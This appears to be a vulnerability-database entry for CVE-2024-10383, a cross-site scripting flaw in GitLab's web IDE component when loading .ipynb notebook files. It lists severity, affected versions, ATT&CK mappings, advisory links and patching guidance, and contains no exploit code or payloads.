CVE-2024-10383
Published: 07 February 2025
Summary
CVE-2024-10383 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Gitlab Gitlab. Its CVSS base score is 8.7 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 36.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2024-10383 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in the gitlab-web-ide-vscode-fork component distributed over CDN. It affects all versions of this component prior to 1.89.1-1.0.0-dev-20241118094343. The component is used by all versions of GitLab Community Edition (CE) and Enterprise Edition (EE) starting from 15.11 prior to 17.3, and it also temporarily affected versions 17.4, 17.5, and 17.6. The issue arises when loading .ipynb files in the web IDE.
The vulnerability carries a CVSS v3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N). Exploitation requires low privileges and is network-accessible with low attack complexity, but it demands user interaction. An attacker can trigger XSS by inducing a victim to load a malicious .ipynb file in the web IDE, achieving high impacts on confidentiality and integrity with a changed scope.
Mitigation details are available in the referenced advisories, including the GitLab issue at https://gitlab.com/gitlab-org/gitlab/-/issues/500785 and the HackerOne report at https://hackerone.com/reports/2765778. Affected instances should update the gitlab-web-ide-vscode-fork component to version 1.89.1-1.0.0-dev-20241118094343 or later, as incorporated in supported GitLab versions beyond the affected ranges.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-53885
Vulnerability details
An issue has been discovered in the gitlab-web-ide-vscode-fork component distributed over CDN affecting all versions prior to 1.89.1-1.0.0-dev-20241118094343and used by all versions of GitLab CE/EE starting from 15.11 prior to 17.3 and which also temporarily affected versions 17.4, 17.5 and…
more
17.6, where a XSS attack was possible when loading .ipynb files in the web IDE
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
XSS in public-facing GitLab web IDE enables direct exploitation of the application (T1190) and arbitrary JavaScript execution in victim browser context (T1059.007) via malicious .ipynb file load.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Filters output from .ipynb files in the web IDE to prevent execution of malicious scripts causing XSS.
Validates inputs from .ipynb files prior to processing in the gitlab-web-ide-vscode-fork component to block malicious XSS payloads.
Ensures timely remediation of the XSS flaw by updating the vulnerable gitlab-web-ide-vscode-fork component to a patched version.